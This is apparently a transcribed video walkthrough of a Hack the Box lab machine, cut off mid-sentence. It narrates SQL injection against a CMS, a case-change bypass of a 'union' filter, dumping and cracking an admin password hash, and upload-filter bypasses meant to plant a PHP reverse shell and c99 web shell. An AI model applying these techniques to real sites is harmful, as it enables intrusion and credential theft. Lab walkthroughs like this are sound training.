Well, welcome back to Sabretooth at Nethemba, where we care about your security. It's Hack the Box Friday. By the time this one comes out, I'm away on vacation. I'm terrified by this. Less than 1,000 roots. To say that Hack the Box has a user base of 4.1 million, anything less than 1,000 is worrying. Even the insane one after this has more roots than this one. Okay, so here's the IP address. The last difficult one we did was Calamity, and that was also on Hack the Box. So let's go. Let's do nmap T5, all ports. I should probably get Burp Suite running. I should probably get Metasploit running as well. So we'll do that. Just in preparation. I love that the splash screen doesn't allow anything to go over it. It's so useful. Oh, it does. Okay, my mistake. We'll also get our IP address as well, because I'm sure we're going to need that at some point. 14128. Okay. Okay. I'm not sure what to expect on this one at all. I've not read any info or anything like that. I'm immediately going to... I was going to say adventure mode, but all it's looking for is user and root flag. Wow. Okay. Interesting. I'm a little bit concerned. I have to admit that. Especially because this is taking a while. How many ports is it finding? 2 is the answer to that. Okay, that was a bit of a surprise, but that's alright. I'm not going to start complaining about Burp popping loads of stuff up. I wonder why every other app in pretty much in the world can do this without having to pop up splash screens and stuff. Anyway, SSH, open SSH 7.2. Okay, and then we have port 80, which is web. Frozen yogurt shop. Yogurt for the Americans out here. Yogurt. Okay. Freeze. Home, about, and blog. Freeze delights. The twist of healthy yogurt. Website template. Okay, blah, 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 blah. Products, our story, flavors, application. Powered by Super CMS. Interesting. Okay. Website shows powered by Super CMS. Let's search exploit this. Oh wow. I mean, is this a custom? Is this custom? Huh. Okay, about products. And blog, single post blog, recent posts. Okay. ID 10. Okay. So let's try ID 11. Let me turn that noise off. ID 12. ID 100. Or 1 equals 1. 100 apostrophe or 1 equals 1. Okay, this doesn't, hang on a minute, it doesn't have any writing now. I don't think it did to start with. So let's do or 1 equals 2. Doesn't look like SQL injection here. Oh, hang on a minute. So if we do all 1 equals 1, we have some output. If we do all 1 equals 2, we do not. So it's pulling the first block from the database. So this is a SQL injection. Interesting. Okay. So this, excuse me, shows a blog post. Whereas this, let's change that to a 2, does not. Obviously, SQLMap is likely a good way to go. Or not, as the case may be. Risk 2, level 2, batch, threads, 10. While that's running, I think we should do some sort of... I've not checked for robots.txt yet, which it should do. GoBuster. So our images CSS.js include. It's not finding anything, so I'm going to have to put risk up to 3 and level up to 5 perhaps, because that's like the biggest it could do. That might take ages though. Fonts. Let's see what's include. Do not have permission. Okay. Let's do robots.txt as well, because I forgot to do that. We'll do a dir search as well, because why not? Just with the default list. Should check. I was going to say check the JS, but okay, so why not? Yeah, as I thought. Do not have permission. If this is going to take ages. That might take ages. About.html, blog.html, it's found both of these. We know about these. Contact.html we know as well. So what we could do as well, powered by Super CMS. Worth a try. Whoops. Okay. That's fine. Oh, CMS data. Interesting. Do not have permission to access CMS data on the server. No. To be honest, of all the folders it's found so far, that's the one which I think I'm going to be more interested in than any other. We'll wait for this to complete. Wait for this to complete. I wonder how it's not even found that there's some sort of injection here. Maybe I should have given it. Let me stop this. I know this sounds dumb, but let's go again. But I'm actually going to give it ID 10 because I know that one exists. I shouldn't really matter, to be honest. That's 91%. Product.html. What's this one? Have we been here? I don't think we have. Oh, about and then product. I thought it was about product. I see. Okay. Okay, well, these are not clickable, so just mirrors that the same picture, just with the color shift. I think so. That's funny. Task completed. Okay, that's found nothing. Let's take that because it's found CMS data. I suppose what I could do at this point is actually just go a step deeper. That would make a lot of sense. Just to see if there's anything in here which we can actually access. Like images, scripts, CSS. Okay, so it's found all these. We'll do the same here as well. And this, I don't think it made any difference. Okay. Lame. That's fine. It's just a case of waiting at this point. There's not much else I can really be doing right now. That's not finding anything yet. 40%. Lovely. I could have tried a bigger list as well, actually, rather than just the default one. But as it turns out, I don't know. I think it's to do with this SQL injection, you know, because it does exist. It's just, whoa, not finding it at all. Forgot.php, login.php. Why don't I try these things? Am I an idiot? Admin.php and stuff like that. Am I stupid? Must be. Admin.php. Login.php. Finally, we've got something happening. Oy vey, admin. Hang on a minute. Let me just make a note of this. Admin password. I wonder if I'm going to need to brute force this. Or even yeah, there's no SQL injection there. There's forgot password as well. I've got a tickly nose, and I had a tickly nose yesterday as well. Retrieve password. Email address, perhaps. Oh, it's up here. User not found with that email. So what's this say? Incorrect format. Was that the same on login? On login, did it have the message up there? Because I think I missed it if so. No, there was no message there. So if I do this, we get incorrect format. If I do this, we get user not found with that email. Okay, fine. So what do I even do at this point? Oh. Oh, format. test@test.com or 1 = 1. Oh, user not found with that email. Hold on a minute. So what if we do or 1 = 2? Maybe not. What if we just do a error in database? Huh. It didn't say that before. Okay. This in forgot password shows error in database. So SQLI here as well, perhaps. Intriguing. Let's also try that over here. Although this is not asking for an email address, is it? User and pass, so that won't actually work doing that. Let me see them. Let me see. I need to think about how to do this. Probably just another SQLMap, perhaps. If I put that in, this is a post request though, so I should probably do it by burp. This one's tricky so far. But we're getting some findings. I'll put that to the repeater and see what happens. Let's get the whole thing happening. See, I'm not sure about this one now. It is sort of running. ID does not seem to be injectable, and now it's gone to user agent. So, I mean, maybe that's a false positive. Let's kill this then. Kill this entirely. So we're going to do nano post 1.text. I'm going to put this in. Save that there, and then SQLMap our post 1.text, and just see what happens here on the very basic scan. Let's kill this, and let's go with more threads at least. And we'll do a batch in case it asks questions. So now I can just sit back and relax on this one. Whilst that's running, that's done. There doesn't seem to be anything interesting here unless we can visit that include file, which I'll take a check in a minute. Then we've got login. Okay, fine. Nothing else there. So let's try includes. Okay. Oh, so it's not found. Was it include? Do not have permission to access. Okay. Oh, it's found something. Post blind based. Interesting. So let us do DBS for databases. Fetching current database. Okay. Okay, so we will take a copy of this. Hang on, it's having some trouble here. Invalid character detected. It's because it's time-based, so it's going to take a bit longer. Oh, no, it's finding something. SU. Is it going to be super CMS? That would make sense. Looks like it. Looks like it. So this is going to be a very long... If I'm dumping the whole table and whatever, it could take quite a while. Which is a little bit horrible, but that's okay. So I'm just trying to get this if I can before it does that. Okay, as it's doing stuff, it's updating the terminal, and it won't let me select things because it just kills whatever it is I'm trying to copy. unless I do that before it kills it and then paste it in. But the problem is I've now got loads of junk before what I need. There we go, all this, get rid of that. Okay, nice. So we have what we need here. I'm guessing at this point we're just going to SQLMap all the way. Available database is Super CMS. Okay. Well, we'll do this with D Super CMS, and then we're going to get tables. Okay. Multi-threading is considered unsafe in time-based. Okay, well, we'll get rid of the threads then, in that case. We'll go again. Huh. So it's not able to find any tables, but it says that we could do a common table existence check. So we can try this one. We'll get rid of batch. So now we have to actually answer that question. Yes. Are you sure you want to continue? Yes. Default. Yes. So now it's trying 3,449 table names. Which is not taking as long as I thought. It's got groups. It's got groups. I'm expecting users, hopefully. We've got hit counter. Okay, let me check that message that came through earlier now that I've got time. Not important, I guess. It's got groups and hit counter. I think groups is going to be the important one. The hit counter, obviously, it's just going to check number of hits on the whatever. On the blog posts, or I don't know. I know this is the same. Yeah, maybe. I don't know. On the pages. Groups could be like user groups and things. It's interesting that it wasn't able to find the column names itself. Sorry, the table names itself. It has to brute force them. Why is that? I wonder if there's some sort of protection here. I could try a bigger word list and look for other tables, but I think we're just going to try and get some columns from groups. Oh, we've got my MPS member album, my MPS member docu type. Okay, so I think what we're going to do here is we're going to use the table groups, and we're going to do a columns. Again, it's not able to do it, so it's having to. Okay. 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 I understand, I think. Has difficulty retrieving table names and columns, therefore data, I guess. If we don't have those, we can't get data out of it. It looks like we may have to do a manual. Oh, this sucks. Looks like we may have to do a manual. Oh, no, we've got user ID. Login I. Okay. Maybe this isn't so bad actually. I was thinking I might have to do something manually. Let me start playing around with this just in case. So if we do this, all 1 equals 1, right? Where is the user not found with that email? Now that's weird because you'd think that this email definitely doesn't exist, right? But if it says all 1 equals 1, then every other email in the system would match that. So why is it saying user not found with that email? Unless it's trying to... it's got like a concatenation of everything. Let's limit this just to one result. Oh my god. Email sent to test1@aa.com test1. So that's the first email address in the system. Okay. Right. I'll just copy that bit. We don't need the whole output. So let's keep an eye on this. Oh, that's numeric. User ID is the only one that's non-numeric. So we're going to use column user ID, and then we're literally going to dump all the data if we can. Oh, there we go. It's like Arnold or something. Right, okay. So whilst that's happening, let's just keep going with this because there's nothing else to do except wait. What if we do 1, 1? So what that does is it starts from, hang on, if we do 0, 1, it starts from the first record and pulls 1 record. Does that make sense? So now it's starting from 0 base, so it's starting from the second record and pulling 1 record. Got test 3 here. Sorry, that's the second record, and it's pulling 1 record. For test 2, and now this is the third record, despite it being number 2, so it pulls test 3. Barbara Beatrice. What is happening? Arnold, Barbara Beatrice, decode. Oh. Decoder. Interesting. There's no passwords here though, it's just usernames, unless I can brute force a password. Anyway, we'll leave that running. So I think what I'm going to do is actually just send this to the repeater and see how high it goes. Not the repeater, the intruder, my apologies. We're just going to do, I know you probably can't see what I'm doing here, my face is in the way. We're going to do numbers. We're going from 1, we're going from 0 actually, all the way to, I don't know, 100, 1,000, whatever. And then we can start the attack. So here we are doing limit 0, 1, and then in the next one we are doing limit 1, 1, and so on, and 2, 2, 1, and 3, 1. So what we're going to do is a response, and what I'd quite like to look for is email sent to, because if that exists, then it means that it's working okay, and it's actually, you can see down in this corner here, one match. We can click the match and go straight there. So 19 and so on. So we're just going to keep going until it dies with 0 matches, and we'll see how many users there are in the system. There's a lot here, man. What's going on? Ah, 0 highlights. So going back up. Okay, so there are 200 and it goes up to 201. So there's like 200 users in the system here. Test 199. Test 200. Oh, Super CMS admin. Decoder. Oh, cool. Okay. Okay. Right. Let's update everything. Super CMS admin, I guess. Yeah, there it is. Super CMS admin and decoder. So we found these 2 users in the database in what we were doing. From the forgot password, this is in the group thing. Oh, it's going to come up with test 1, 2, 3, 100 and whatever. Oh my god. So it looks like there's a few more here. Oh, this is cool. Right. We can't get passwords and things though, can we? Yeah, that's just going to keep going at this point. Okay, I will comment on this once it's complete, however long that may take. I'm going to stick with manual for now because that's what seems to be working quite well. So we put the following into intruder. Yeah. And increment. When we get to 201 and 202, we have non-test users. Where is that? Oh, it's not 201, 202. Oh, it might be. Yeah. Okay. So manually we found these users, and then obviously this is also doing its thing. Oh, it's only got up to 3. Interesting. I wonder if there's any way to get passwords for these users. Interestingly, SQLMap finds the following. Okay, we're going to focus on Super CMS admin, obviously, because that looks like it's the admin user. Boom, you know, big brain sort of thoughts going on here. But decoder could be useful as well. I'm not sure about the others, but we'll keep them in mind. What do we do now? Okay. maybe do a union. But the problem is I don't know the names of the other tables. We've got some, but they weren't in the. Come on, get with it. They weren't in the what? They weren't in the word list on SQLMap. I could run SQLMap again and give it a bigger word list, perhaps. If I go up here and get a different table, perhaps. Yeah, so it's done that and it's got those 4. But I kind of wonder if I can do this. I kind of wonder if I can do this again with a bigger word list. I wonder if I can do this manually. That's another thing as well. So maybe information schema. I guess. Okay, so what we're going to do is just try putting in some random here, and we're going to union to connect to. It's going to run a second query. So select. Hang on a minute. Will union? Yeah, I don't see why not. I don't see why that wouldn't work. Select, and then I think it's table name from information. The thing is though, union only works if it's got the same number of columns. Let me explain this. Let's just say that it's selecting from some table called cake, right? And let's say cake has got 6 columns in it. It's got ID, username, password, whatever like that, right? If I do union, it will combine the results of the original one to the one which I'm just writing here just afterwards. The problem is that only works if both cake and this table have the same number of columns. Or at least it definitely won't work if I'm trying to pull from more columns than is available in the original. Does that make sense? I hope that makes sense. I'll explain this. I'll explain this again in more detail. So I think it's information schema. Right, the information schema. Give me a second. Tables. I think that's right. Information schema. Every database has, at least every MySQL. Let's just try that. I don't think that's going to work. Error straight off. Boom. Right. I can't explain very easily information schema. Let me find an easier way to explain what's happening here. There we go. So read in the set of views in a database that provides metadata about all the database objects such as tables, views, and columns. So if we can select from information schema, we can find out all the names of the databases, and we can find out all the names of the tables within that database. We don't have to guess them, like with a word list, which is what SQLMap is trying to do. So what I could actually do here, just to show how I do know how to do this myself, but I just want to show how it's explained elsewhere. Okay. So examining the database and SQL injection attacks, right? I mean, I could just try that, selecting version. I didn't even think about doing that. So union select version. I could just try that straight off and see if that works. So we'll come back to this, union select version, right? Now there's a chance that it's going to have an error here, and the reason there's an error is because I'm selecting just one column, right? I'm selecting just one column from. The reason why I'm sticking with MySQL is because that's what the information that was given to us from SQLMap here, right? Backend is MySQL, so the @@ version should work. The thing is, I'm only selecting from one column, and this table has got more than one column, so we need to figure out exactly how many columns there are. So we're going to union select one, error, and then we're going to select from two columns, 1, 2, error, and then 1, 2, 3, error, and then 1, 2, 3, 4, error, and then 1, 2, 3, 4, 5. You see how this works? So maybe, hang on, it might have more than that. Maybe I should get rid of the dash dash at the end, because we are, although we won't need it. I don't know how many columns to expect here. Let's get rid of this as well. I'm just going to work our way backwards, because if it's more than 10, generally there aren't, not in this type of challenge, but there could be. That took a while to load. I'm surprised that it's not actually coming up with anything. Right, let me just think. If I do that, that works, but it says error in database. If I do select, that works, error in database. So why? Huh. Let's try it lowercase. Huh. Let's try camel case. Oh, that's allowed. Union is blocked. Ugh. The keyword union is blocked. Right. Okay. Union and union are blocked. But we can use union as an example. I'm not sure if that's how I did it, but it looks very similar, doesn't it? So now if we do union select 1, so there's never normally more than 10. I mean, there could be, but not usually. What am I looking for? If I look for error in database, union select 1, 2, union select 1, 2, 3, union select 1, 2, 3, 4, union select 1, 2, 3, 4, 5, union select 1, 2, 3, 4, 5, 6. Do you know what? I've just realized what I've not done. I need to put in this, because if I don't put in this, that apostrophe here is put in by the system at the end, and that will really mess things up. I'm doing things wrong. I'm doing things massive. I'm just looking down here for one match. I just realized that I'd forgotten that, because I took it out earlier, didn't I? If I get to 10 and it doesn't work, I'm going to actually have to try 11 to 20, which sucks. Oh, look at this. 0 highlights. Incorrect format. Interesting. Okay, well, I don't need to take the whole thing. So, incorrect format. Where have I seen that before? Where have I seen that before? here. So we need, my god, it's dark, isn't it? Let me get a light on. I think we need, hang on. I think he's expecting an email address somewhere in here. So we'll try at.com. Area database. That makes more sense. Whereas that, does it matter which one? I've just thought as well, actually, these actually need to be in quotes because otherwise it takes it as a hex literal. So we will do at.com, I think. I think that might make more sense. So we're still at this point getting incorrect format. So what if we now do that as column 2? Incorrect format. So now do this as column 3. This is ridiculous, man. I don't think this is working at all, is it? So we'll do it as column 4. Email sent to aaa.com 2. Nice. Right, I'll explain why this is good in a second. I'll explain why this is really good in a second, because now we've not got a blind SQL injection. I'll show you exactly what I mean by that. So, incorrect formats means we need an email address in one of these column names, well, columns, or whatever it is we're trying to grab, because at the minute we're trying to grab literal integers 1, 2, 3 and 4, and they're always going to exist, okay, in one of these placeholders. That's a good word. It works in position 4, technically position 3 if you're counting from 0, but I'm not. So if I do this, the result we get is this. Now, that means that in the original query, the email address is in column 4. It might be like ID something something, like username, and then email address is column 4, right? The username, which it then comes out with, let me show you an example. Obviously I can't. I need some valid email address. I just need some valid email address. I must have found one by now. Yeah, here. Oh no, this is what I was looking for. So the email address is in column 4 and the username is in column 2, right? But column 2, because we're now just giving it a literal, is showing a literal. I can give it a literal string like moo, and it will now say, hopefully, right? So I can pull values from the database. For example, I can now do at version, and that will now appear here. So whatever we pull from the database, we can now, in column 2, display it to us. Hopefully that makes sense now. It's no longer blind. Good. We're getting there. It's a slow process. We're getting there. It's been a little while since column 2 chose whatever we request. It's been a long time since I've done manual SQL injection like this, but it's always nice to refresh this sort of skill. You know, SQL injection is still quite a very prevalent thing. So technically, we've also got some code execution there because we're asking it for the version and things like this. So now I should be able to union select one, then a column name or something like that from, oh dear, from information schema. That was the original plan, wasn't it? Information schema. Okay, so let's do this. I'm not entirely sure how I'm going to do this. So I need to keep this at the end. We're going to select I think it's table name. Let me have a look. We'll come back here, you see. Listing the contents of the database from information schema tables. So that is selecting everything, but we just want like the table name. Yeah, where the table name. Okay, so we are going to attempt to grab the table name in column 2, because that's what's going to be output to us, right? We still need to keep the 4 columns from information schema tables. I think that's right. Let's try that. User not found with that email. Select one table name from information schema tables. We're not told which database to use. We've got a list of databases which it has, or at least we did have. We've got one database. Where is it? Super CMS. So okay, so that's going to be where I think it's table schema, where table, is it underscore schema or dot schema? Underscore, I think. Schema is super CMS. So it's selecting the table names. Oh, I might have to limit it if there's more than one table, similar to how we did before, limit 0, 1, whatever. So union select table name from information schema tables where the table schema is super CMS. User not found with that email. So we're going to limit 1. So we're just going to take the first one, I think. Say groups, right? Now groups, SQLMap found. Brilliant. Which means now we should be able to find some more table names which SQLMap did not find, perhaps. Okay, so this is quite a complicated one. We grab from information schema. I'll tell you what, I'm just going to get a book. This is from back when I was doing the Red Tiger challenges. I'll put it this side actually. Everything on this side. If you've not seen Red Tiger, it's part of Over the Wire now. And this is all like manual SQL injection going into things like schema and stuff like that. It's really good. And if you do a search for sabretooth, yeah, there I am. So I actually did all 10 challenges here, got through them all. So if you want to try some SQL injection, redtiger.labs.overthewire.org, and you can do this to your heart's content. Anyway, I'm not wasting time on Red Tiger. I'm not wasting time on Red Tiger. So this is what we kind of did. We selected, but we did the table name. So then we can do the same with the columns once we have the right, you know, and so on and so forth. Okay. So we go from information schema, limiting by one result at a time. Oy vey. So this is our SQL injection here. The result is there. Now all I need to do is, if I do 0, 1 like last time, we can send this to the intruder like last time and do exactly the same thing. We're going to the intruder, we are going to use numbers, and like I say, there's never really more than 10 columns, but let's do from 0 to what, 20, just to see if that was right or not. Okay, so in the response, this one is groups. Oh, groups. Okay, what am I doing? License. Did we have license? We didn't. Groups, license, operators. Let's make a note of this. Is it with an S? License, operators. Make sure it is with an S. I'm used to the UK way of writing things. Yeah. And then user not found with that email. So you can tell by the length, 5, and then when it goes to 6582 all the way down, oh no, there is 6581 here as well. But really, we could actually literally just put that in, and then we'll see which ones match and which ones that don't, all the way down to the bottom, going upwards. Okay, so these are the only there we go. These are the only. I wonder why I didn't find these. Hit counter. I'm not sure what's happening. Anyway. So operators probably is similar to users. I can see why it didn't find it like in the users table. Let me look through this book and see what we can find here. I mean, yeah, I don't know. So I'm guessing operators is the way to go. So maybe I can do the same now with columns. So we're going to, instead of doing information schema tables, hang on, let me think this through. Let me look at my book. Instead of doing information schema tables, we could do information schema columns. Does that make sense? And then instead of the table schema, we can just hopefully just do table names, because we just search the table names. Operators. Ah, I just realized I'm doing this in an intruder. That's awful. Let's go back to the repeater here. Is that it? Error in database. Okay, let's figure out why. Union select one. Oh, I've got table name. I don't want table name. Hang on. Column name. We have table name. not names, equals operators. Does that make more sense? Okay, so ID is the first column. Yes. I'm expecting the fourth column to be obviously email address. Okay, we search the columns or figure out, we query the columns in this table. I'm not saying operators is the right table, it just makes sense. So this one is ID. And then we're going to do 1, 1 for the next. And that one is username. Oh, with underscores. Right, so it won't be able to find it in basic lists. Wow. Okay. Username. Then we'll do 2, 1. Password. Got it, password. And then obviously column 4, we already know, has to be email address due to this. It has to be in column 4, right? So that's ID, username. Of course the username goes in column 2. It's obvious that username goes in column 2. Look. Here, email sent to, whatever's in column 4, followed by whatever's in column 2, i.e. the username. Idiot. Duh. So we know what's in column 4. Email address. And if I look for column 5, it won't exist because we're established there's only 4 columns. That's in our union here. And if I search for the next one, it'll just come up with a error. User not found with that email, right? Ooh, we're getting there. So now we can union select password. No, it's not password. It's underscore underscore password underscore. So select this column. Select the value, the row, right? The column, sorry, password from, we don't want information schema anymore. We just want the table name, right? So we're going to do this from operators where the username is, we don't even need the limit anymore because there's only going to be one result. We are selecting the password from operators table where the username is super CMS admin. This is our current query. Password hash. Brilliant. The password hash for this user. I want to get the one for decoder as well, just to be sure. Where the password hash is here. We'll also run decoder as well. CF99 begins with 5F. That's password. That's MD5 for password. I know that for sure. Why is the crack station not in my hack resources? Hang on, let's get rid of burp. Why is crack station not actually working today? Is the next thing. Oh, it's .net. That's probably why. It needs to be in there. There we go. It's in there now. That is definitely password without doubt. Okay, so I'm not bothered about decoder. Let's just grab this one and see if CrackStation can do anything with it. Ah! Nice. Nice. So I could try SSHing. Oh no, it's the admin CMS, isn't it? CMS admin. It's not on the system. So maybe I can't. Anyway, look, we've got a result. We've got a username and a password out of this, which honestly I was not expecting to get. I can see why this is rated a hard system, by the way. This is not simple stuff. It is when you get used to doing it, but a lot of people are not. They just run SQLMap and that's it. Now I run SQLMap a lot and leave it at that because I can get away with doing that. But you need to know how it works some of the time. Which means that now I'm kind of hoping we can literally go back to login, and we can grab that, and the password is TAMARO. We're in. We've not yet got a shell on the system, but we are in. We can update the about page. Oh, interesting. Can we put PHP code in here? I wonder. No, we can't, because it's about.html. It's not about.php. These are all HTML files. Damn. At least I think so. Yeah, it's HTML. We can't. Yeah, we can't. It would have been nice just to have put in some shell or whatever into there, but we can't do that. Upload image file. Huh. Okay. This gives access to the CMS login page. We have rights to upload an image. I'm guessing it's going to be some sort of filter bypass here. Not entirely sure, but let's find out. By the way, as soon as I get a shell on this thing, I'm taking a break. As soon as I get a shell on this thing, I'm just taking a break because this is crazy. So we're going to copy Prives scripts. Nope, wrong one, shells. We're going to copy c99.php here, and we're also going to copy the PHP reverse shell here. We're also going to we'll get rid of, I was going to say get rid of post 1, but whatever. We're going to nano PHP reverse as well, just to make sure our IP is correct, which I don't think it is at the minute. No, we are still set as THM. And HackTheBox 10.10.14.7. I don't think that's right. So let's have a look. 10.10.14.128 it is now. So we're just going to make sure that our local copy here is fine, and as well as that, we do that. Okay, good going. So we're going to upload what do we think? What's this one called? Can't remember. Charon. There we go. Allowed extensions are JPEG, GIF, or PNG. Right, images only, guys. Images only. Yeah, it says upload an image. It did say that. File type is restricted to, what was it? JPEG, GIF, and PNG, I think. I said GIF because, you know, it's like golf. But having said that, giraffe is a J, so I can see why people say GIF. I say GIF. So the first thing we're going to do, there are a few things that we could try here. The first thing we're going to do is rename PHP reverse shell to, we're just going to call it shell.php .jpeg, because what this does, if you think about a URL, you put a question mark on it, it starts the parameters, so it's going to see it as a JPEG extension, but it's going to ignore this because the file name stops there. So I think that's probably a good way to try it. So we're going to upload this now. Only image files. Okay, so we passed the file name check, file extension, but it knows it's not an image file. So we're going to move on to the next step that I would generally do when dealing with things like this. We're going to upload one more time. And grab it here, apparently, or not, as the case may be. Oh, okay. Idiot. There we go. There it is. Don't forget to activate burp suite. Fine. So we've got form name, image, and here it says application art text stream. So I'm going to change that to image ping. So now we've got the... Why has it not got anything in the file name? That's interesting. Extension not allowed. Choose JPEG, ping, or GIF file. Oh, I understand why that's happened. It's because I just hit enter a few times. I need to actually reselect the file, I think, and do that. That might make more sense, because now you can see that we've got our shell in here. Right, that's what I was missing. So it bypasses the extension check due to this, and it says image JPEG. But it's checking that it's actually an image file. Wow. Okay. Right. Despite changing the file type to PHP JPEG, and the MIME type to image, was it JPEG? I assume so. I usually just use ping files. Yeah, image JPEG. It still complains that this is not an image. So magic bytes, we need to give it an image header. That's the third thing I would check. Right, there's always like a checklist of things to do and stuff like this. So let's look up some magic bytes here. Magic bytes. Whoops, I didn't mean to go into my image hacks here. List of file signatures. There we go. Or identifying common file formats. Okay. So we're just going to look for can't find JPEG. JPG. Can't even find it. Lame. Let's go again. Look on Wikipedia. JPEG. Okay, so this is the data is expecting to see. I'm not sure whether I can just copy it like this or whether I have to do it in hex mode. We'll try it like this. We'll go again, and above our PHP code here, we're just going to put in this image header and send it. Only image files. Interesting. So if we look at this in hex mode and we try and find this part that I've just put in, which is here. Let's compare this. FFD8FF. I can't find an FFD8FF anywhere, quite honestly. Okay, so FFD8 FF FFD8 FF DB. We'll just try it as that and just see if that will work. Okay. I'll try it again. And the image files. So maybe I should try ping instead. I'm generally better at working with those. So we're going to do PNG. We're going to do image PNG. And we'll get rid of this header. And we'll just look for ping here because I always prefer doing that. It's never as difficult to. There's only like one option, whereas there's loads for JPEG, and I don't know what it will work and what won't. So this we should be able to insert, I hope, here somewhere. If I go to the hex, where actually are we? PHP reverse shell. It's going to be somewhere about here. Here. Oh no, we've got an OA, OD, OA, OD. So maybe here. Can we insert? Insert bytes. Oh. So we're going to insert how many bytes? 1, 2, 3, 4, 5, 6, 7, 8 bytes here. Invalid hex code. Oh. So do I need to do the OX? I mean, probably not. I was wondering whether I can literally just do that, or whether that'll be ASCII. Invalid hex code. I don't understand what it's looking for, quite honestly. I don't understand what it's looking for. So probably the best thing for me to do would be me to do just a few lines like that. And then we'll go back to there, and where we've got this new line, carriage return, whatever, I can actually put these in manually, which sucks, but it's fine. 8954E 47. I'm not gonna remember all those. 8954E 47. 8950 4E 47. Followed by 0D 0A 1A 0A 0D 0A. 0D 0A 1A 0A. Looks like I've been doing this back to front. I've stopped it halfway through a carriage return thing. So we'll get rid of this byte if we can. $89.50.44.70D0A. What is going on? Why is this so difficult? I'm getting so confused. I'm getting so confused. I don't know what I'm doing anymore. I might have to stop. I might have to stop. Zero D 0A 1A 0A. And the image files. Yeah, I'm gonna have to stop. I just can't process this. My brain's shutting down, so I'll be back soon. Do you know what? I'm back because I've just thought of an easier way of doing this. I just want a ping image of any kind. It doesn't matter which, it doesn't matter where from. Oh, look, that's ridiculous. I just want an image. I don't want to go through all this templates and God knows what. It's ridiculous. Forget it. Let's go to images. I can't go there. There we go. That's fine. I just want an image of any kind. Smaller the better, really. Do logo. Licensable. Don't care. Literally just want a logo. Literally just want a logo. Of any kind. PNG. I hate this. I hate sites. You need to sign up for this. You need to pay for this. It's an image. Blimey, it's an image. Even this won't let me right click the image and do things with it. Why is life so difficult? Right, I've downloaded this image. So quite honestly, I really could... Get rid of you. Get rid of you. Yeah, I'll leave that one open just in case. I really could upload this shell.php. I don't want a JPEG. I actually want a .ping now, to be honest. I'm getting really, really worked up. Right, stop. Calm down. Calm down. Calm down. So we're going to rename that to that. Okay, so far so good. We happy? I'm happy. We're going to upload this shell.ping and we're going to catch it in burp. Submit the query. Okay, we're going to catch that in burp. We're going to send it to the repeater. It's number 4. There it is. There's our shell, unmodified and absolutely fine. Okay, we are now going to upload something which should pass, which is this test.ping, right? We're going to submit that, catch it, send it to the repeater. That's now number 5. Let's make sure it actually worked. Success. Images test.ping. Brilliant. Now we just need to combine these two things. We take the ping header, and it doesn't matter where I actually break it off. Maybe there is fine. Maybe there is fine. And now we go back here and we take all of this. See what I'm doing now? Does this make more sense? I'm not sure why I didn't think of this before. Rather than trying to put a header in, we can just steal a header. And then hopefully that will send. Success. Images test.ping. What? Test.ping? I did not call it test.ping. I did call it test.ping. Okay, we're going to call it test.php question mark .ping. And we'll see if that works. Right, let's see if this works first before I start updating notes. NC LVP 1234. Oy vey. It's because the file name is question mark .ping, but it's looking for the file test.php, which doesn't exist, does it? Right, good news, guys. We was able to actually upload the file. That's the main thing. That's the main thing. I'm just going to basically get that. We use an existing image to existing image, and keep the header, the first few lines before adding our PHP code. Oh, obviously that's not even going to, is it? Let's just take that, see if that pastes at all. It's not. So we're going to do it this way instead. Okay. What is this? Hang on, I'll come back to that in a second. This works, but our file will not load as the server is looking for test.php, which does not exist. It's one step at a time. It's like one step, two steps forward, one step back. What is this? What is this? There's a hidden, that's base 64. Let's take a look. Okay, test file 1. Huh. The response has this. This is really intriguing. So I'll tell you what we could do. Could go back to where we were. Inspect. We could get rid of I don't know, I can't actually get rid of these how do I edit? I can't edit as HTML or XML or anything. I can't get rid of these. Right, I can edit that as HTML. I'll tell you what I'm going to do. That won't work. I can't edit that at all. So let's copy it instead. And then here we can edit this as HTML. I'm just going to put it under there. How's that? Brilliant. So, hello. I mean, I don't really know what to even... I don't even know what to do here. So we will... I don't get what this field is for. We'll submit that query. I just want to see how it differs from the queries we've already got. What does this actually do? And where does it actually put it in the thing? Oh, here. So we have the form boundary. Okay, so let's see if we can add this manually here. We're going to put in the form boundary. And then we're going to take that. Okay. So we'll see what that does now to this code. Nothing, no change. I mean, although, what was it called? Test file 1. What if we replace that with test file 1? It saved it as... Huh. It's now saved it as a PHP file. Right, that was lame. I don't even know how to begin explaining this. This is very capture the flag, isn't it? Okay, we find that if we add this form field to the request, it is ignored. But if we instead add test file 1 to the request as a parameter value, as a parameter name, the value of this parameter is used to save the file as the file name, right? That doesn't really make sense, but I'm guessing it's like a debug option, which was sort of removed or hidden or whatever. So if we do that, we actually then get that. Okay, still not found on the server, even though it said it actually was saved. I don't understand that. It did say it was saved, and it seems to be lying to me. So there's my PHP shell after the ping file. We can rename it here. We'll just put shell1.php this time. And it says that it's saved in the previous directory as images shell1.php. So why can't I actually find this then? It's not here. It's in the previous directory. It's here. I don't understand. That says it's saved. Is images open? You don't have permission to access. Okay. No response received from server that time. Oh, that's bad because of that. Let's get rid of burp suite. Is that affecting anything? It really isn't. I don't understand why that's not working now. Right, I'm taking a break. Okay, I've just had a few minutes, just a minute or two actually. I'm not really sure why that isn't working. I'd quite like to go again with C99. The problem with that is that I'm going to go through all this again. And C99 doesn't always work. Maybe I'll have to write my own web shell or something. So we'll keep going anyway, and then if it doesn't work this time, I'm gonna have to take a longer break and think about it. It could be the port, but that's no reason why the file shouldn't exist, quite honestly. That's no reason why the file shouldn't exist at all. So I'll head back to upload. We will burp suite browse. I'm going to get c99.php and send it. I'm going to grab it here, send it across here. And then in the repeater, all we really need to do is copy this to get the form boundary. And then this as well. Is it immediately after like that? Or is there actually a space, or does it matter? I just don't know whether that's important or not. I don't think it matters. We'll put a gap in there. C99.php, I suppose. And this time, only image files. Oh yeah, you know what I've forgotten to do? I'm going to put the header of the ping file. Excuse me. What? What? It's ping there, it's ping there, it's ping here. Maybe it's because last time I put this into the ping file rather than copying the ping file over. I'm losing my voice. I'm losing my voice. I'm also really annoyed. This whole CTF part with the renaming file, it's why do people do this? It's like they make a brilliant box and then all of a sudden it's like, do you know what? I'm going to do a CTF thing. Like, why? Something non-realistic. It's okay. It's okay. So we're going to go c99.php, try this again. And again, array only image files. Why? I don't get it. I don't get it. Look, dot ping, image ping, ping, image file. What are you talking about? That's the exact amount of data that I did last time as well. I'm done. Okay, I didn't really change anything. Well, all I did was I moved back a few steps and then pasted this in again. I obviously needed to leave a little bit more of a space between... Shut up, stupid train. Between this, I need to leave a gap here. I need to wait for the trains to go past. Come on! So, I'm kind of hoping that this time this works, because it didn't last time. Huh. Not found on the server. So this doesn't work at all. I don't 